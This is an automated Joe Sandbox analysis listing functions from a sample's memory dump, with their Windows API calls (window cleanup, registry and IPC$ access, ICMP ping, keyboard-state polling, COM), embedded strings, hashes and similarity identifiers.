Instruction ID: b23c9614e526a7b91241434ed60e74c863b90059a5dfcc7ebf550558c172c401
Opcode Fuzzy Hash: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
Instruction Fuzzy Hash: C2115131A5021A79E720A7A5DC5FDFF6F7CFBD5B40F00082BB811A21D1EA701946D9B1

Function 00528BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5

DestroyWindow.USER32(?), ref: 00528C81
KillTimer.USER32(00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00566973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000), ref: 005669D4
DeleteObject.GDI32(00000000), ref: 005669E6

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
Instruction ID: 30d0a4b81ba2f000b36e6c4fb785cd3ddd457784389474be67a17238baca1d2b
Opcode Fuzzy Hash: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
Instruction Fuzzy Hash: 45618031502B61DFDB259F54EA487397FF1FF62312F144918E082AB5A0CB35AC98EB54

Function 00529838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952

GetSysColor.USER32(0000000F), ref: 00529862

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
Instruction ID: 4cb9e7f3d078a931fe476a7b2be02545f5e048aca7da1330e3f638e743243659
Opcode Fuzzy Hash: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
Instruction Fuzzy Hash: DD41AF31504654AFDB245F38AC88BB93FA5BF27330F184655F9A28B2E2D7319846EB10

Function 005796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00579717
LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579720

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00579742
LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00579866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0057984A
^ ERROR, xrefs: 005797FB
Line %d:, xrefs: 005797A0
Error: , xrefs: 0057981D
Line %d (File "%s"):, xrefs: 0057978F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: af6b7b827216762ec88a924427d34ffe46f42bc3cdc9ffdd9ec789559f132d71
Instruction ID: 80cc43e4dae3be0c9425749b8b5899d28683a7dc2cdb02409d0af7afc2769872
Opcode Fuzzy Hash: af6b7b827216762ec88a924427d34ffe46f42bc3cdc9ffdd9ec789559f132d71
Instruction Fuzzy Hash: 7541207280021AAADF14EBE0DD9ADEE7B78BF95340F104425F60572092EB356F89DB71

Function 005706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005707A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005707BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005707DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00570804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0057082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00570837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0057083C

Strings

SOFTWARE\Classes\, xrefs: 0057070E
\CLSID, xrefs: 00570724
\IPC$, xrefs: 00570784

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
Instruction ID: 24b33ed58f2f657a203f1727a9fedcb3e013658d3200f73d438afd1070e70d02
Opcode Fuzzy Hash: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
Instruction Fuzzy Hash: F9411A71C10229EBDF15EFA4DC998EDBBB8FF54350F144526E905A31A1EB30AE44DB90

Function 00587A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00587AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00587B8F
SHGetDesktopFolder.SHELL32(?), ref: 00587BA3
CoCreateInstance.OLE32(005AFD08,00000000,00000001,005D6E6C,?), ref: 00587BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00587C74
CoTaskMemFree.OLE32(?,?), ref: 00587CCC
SHBrowseForFolderW.SHELL32(?), ref: 00587D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00587D7A
CoTaskMemFree.OLE32(00000000), ref: 00587D81
CoTaskMemFree.OLE32(00000000), ref: 00587DD6
CoUninitialize.OLE32 ref: 00587DDC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: e45ef0b7c5dd411f83bba81f8acaa719ae31d89cd8e3f126ffc69ec6d968d194
Instruction ID: e0eb0b44b998ba408dac48f68a003ae90e1cc16954d485a252e6de2c1b545eeb
Opcode Fuzzy Hash: e45ef0b7c5dd411f83bba81f8acaa719ae31d89cd8e3f126ffc69ec6d968d194
Instruction Fuzzy Hash: 1DC10B75A04109AFDB14DFA4C888DAEBFF9FF48304B148499E819AB361D731EE45CB90

Function 005A541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 005A5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A5515
CharNextW.USER32(00000158), ref: 005A5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 005A5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005A559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A55AC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
Instruction ID: ea8e2b4be976ada3c33e14a844faf45e9a5f019e2946aaab4e145fcb64cc028e
Opcode Fuzzy Hash: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
Instruction Fuzzy Hash: D7615931904609EFDF119F64CC84EBE7FB9FB1A720F104545FA25AB290E7748A84DB60

Function 0056FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0056FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0056FB08
VariantInit.OLEAUT32(?), ref: 0056FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0056FB3A
VariantCopy.OLEAUT32(?,?), ref: 0056FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0056FBA1
VariantClear.OLEAUT32(?), ref: 0056FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0056FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBCC
VariantClear.OLEAUT32(?), ref: 0056FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBE9

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
Instruction ID: 052c8d2941b85b41d45c82aff44a66275088f8fcaffea0f8c130a4442233d49e
Opcode Fuzzy Hash: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
Instruction Fuzzy Hash: B4415F35E002199FCF00DFA4D8589AEBFB9FF59345F008069E906A7261DB70A945DBA0

Function 00579C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00579CA1
GetAsyncKeyState.USER32(000000A0), ref: 00579D22
GetKeyState.USER32(000000A0), ref: 00579D3D
GetAsyncKeyState.USER32(000000A1), ref: 00579D57
GetKeyState.USER32(000000A1), ref: 00579D6C
GetAsyncKeyState.USER32(00000011), ref: 00579D84
GetKeyState.USER32(00000011), ref: 00579D96
GetAsyncKeyState.USER32(00000012), ref: 00579DAE
GetKeyState.USER32(00000012), ref: 00579DC0
GetAsyncKeyState.USER32(0000005B), ref: 00579DD8
GetKeyState.USER32(0000005B), ref: 00579DEA

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8f6b53878ed8cd5fe1f2804be95c920d8f962817de2d43954889e4c7bc82ad7e
Instruction ID: 685d34758f6ca7475cc448b13190a1fd413ce8ef14e5e60e09656be6af4b914b
Opcode Fuzzy Hash: 8f6b53878ed8cd5fe1f2804be95c920d8f962817de2d43954889e4c7bc82ad7e
Instruction Fuzzy Hash: 1941EB345047C96DFF318764A4043B5BEA47F22344F08C05ADACA575C2EBA49DC8E7B2

Function 0059055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 005905BC
inet_addr.WSOCK32(?), ref: 0059061C
gethostbyname.WSOCK32(?), ref: 00590628
IcmpCreateFile.IPHLPAPI ref: 00590636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005906C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005906E5
IcmpCloseHandle.IPHLPAPI(?), ref: 005907B9
WSACleanup.WSOCK32 ref: 005907BF

Strings

Ping, xrefs: 00590676

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 3c550eb622e610f3e54d186f478d3057c34925964454a903109b43cfc1d3b368
Instruction ID: 9f814ae3ae2f078b379af0feebdecb90875333d50973ea182e424a9ce42a4572
Opcode Fuzzy Hash: 3c550eb622e610f3e54d186f478d3057c34925964454a903109b43cfc1d3b368
Instruction Fuzzy Hash: F5916C356042019FDB20DF15D488B1ABFE4FF85328F1599A9E4698B6A2C730FD85CF91

Function 00598CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00598CF3

Part of subcall function 00578E54: _wcslen.LIBCMT ref: 00578E77

_wcslen.LIBCMT ref: 00598D4E
_wcslen.LIBCMT ref: 00598D9C
_wcslen.LIBCMT ref: 00598DDC
_wcslen.LIBCMT ref: 00598E6E

Strings

stdcall, xrefs: 00598DD6, 00598DDB
winapi, xrefs: 00598D96, 00598D9B
cdecl, xrefs: 00598D48, 00598D4D
none, xrefs: 00598E65, 00598E6A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
Instruction ID: a53a5601b67f748e7e8b52716f4967f956f04f3a7f262ffda55c86cccd0f5692
Opcode Fuzzy Hash: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
Instruction Fuzzy Hash: AC519431A001179BCF24DF6CC9509BEBBA5BF66720B244629E426E73C4DB35DD40C790

Function 0059372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00593774
CoUninitialize.OLE32 ref: 0059377F
CoCreateInstance.OLE32(?,00000000,00000017,005AFB78,?), ref: 005937D9
IIDFromString.OLE32(?,?), ref: 0059384C
VariantInit.OLEAUT32(?), ref: 005938E4
VariantClear.OLEAUT32(?), ref: 00593936

Strings

Failed to create object, xrefs: 005937E4, 0059389A
NULL Pointer assignment, xrefs: 0059381E
Invalid parameter, xrefs: 00593865

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: c55db850f75ac87a2f66fc61aae2700cba9ce81ecf80317b74ef240c099ae4d2
Instruction ID: 21e47184bd8155c0ce31768e3ffbbb48a829bf99ac12fd1f2fd0b081e013da92
Opcode Fuzzy Hash: c55db850f75ac87a2f66fc61aae2700cba9ce81ecf80317b74ef240c099ae4d2
Instruction Fuzzy Hash: EB617971608202EFDB10DF54D889B6ABFE8FF89710F004819F9859B291D770EE49CB92

Function 005A8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2

Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 005A8B6B
ImageList_EndDrag.COMCTL32 ref: 005A8B71
ReleaseCapture.USER32 ref: 005A8B77
SetWindowTextW.USER32(?,00000000), ref: 005A8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005A8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 005A8CFF

Strings

@GUI_DRAGFILE, xrefs: 005A8C9A
p#^, xrefs: 005A8C71
@GUI_DROPID, xrefs: 005A8C51

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#^
API String ID: 1924731296-4032057566
Opcode ID: 9b6791fda17731ee25574be3e890b70120333fdb9b620b123835f6352c847ba5
Instruction ID: d65b7d930107cc718ae49dd7914e4df3004e74037b0c6302dae5329496e7391d
Opcode Fuzzy Hash: 9b6791fda17731ee25574be3e890b70120333fdb9b620b123835f6352c847ba5
Instruction Fuzzy Hash: 9A518D70104345AFE714DF14DCA9BAE7BE4FB89714F000529F9929B2E2DB709D48CB62

Function 00583388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005833CF

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005833F0

Strings

^ ERROR , xrefs: 0058349E
Incorrect parameters to object property !, xrefs: 005834AB
"%s" (%d) : ==> %s:, xrefs: 00583522
Error: , xrefs: 005834D1
"%s" (%d) : ==> %s:%s%s, xrefs: 00583504
Line %d (File "%s"):, xrefs: 00583443, 0058345C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 2c5b753b663f0a139c51f28c0c28e159c0975d32c3bfecdbbcecb43d0f98862c
Instruction ID: b97928cbf6668750fe2cbab7faf2d9bd8b255a27dcb82d62a7769dcb87649bd9
Opcode Fuzzy Hash: 2c5b753b663f0a139c51f28c0c28e159c0975d32c3bfecdbbcecb43d0f98862c
Instruction Fuzzy Hash: EE51B37180020ABAEF15EBA0DD5AEEEBF78BF54740F104466F50572161EB312F98DB60

Function 0057B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0057B5FC
_wcslen.LIBCMT ref: 0057B608
_wcslen.LIBCMT ref: 0057B64D
_wcslen.LIBCMT ref: 0057B68C
_wcslen.LIBCMT ref: 0057B6C7

Strings

EXISTS, xrefs: 0057B686, 0057B68B
REMOVE, xrefs: 0057B602, 0057B607
KEYS, xrefs: 0057B647, 0057B64C
APPEND, xrefs: 0057B6C1, 0057B6C6

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
Instruction ID: 9d3d8b958fce7c9f6bb1e33cf411d7d3e757fb5e8f625136b9ba80c7532fa462
Opcode Fuzzy Hash: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
Instruction Fuzzy Hash: 2C41FD72A000279BDB205F7DD8906BE7FB5FFA0754B24812AE629D7284E735CD81D790

Function 00585393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005853A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00585416
GetLastError.KERNEL32 ref: 00585420
SetErrorMode.KERNEL32(00000000,READY), ref: 005854A7

Strings

INVALID, xrefs: 00585459
READY, xrefs: 00585460, 00585468
UNKNOWN, xrefs: 00585444
READONLY, xrefs: 00585452
NOTREADY, xrefs: 0058544B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
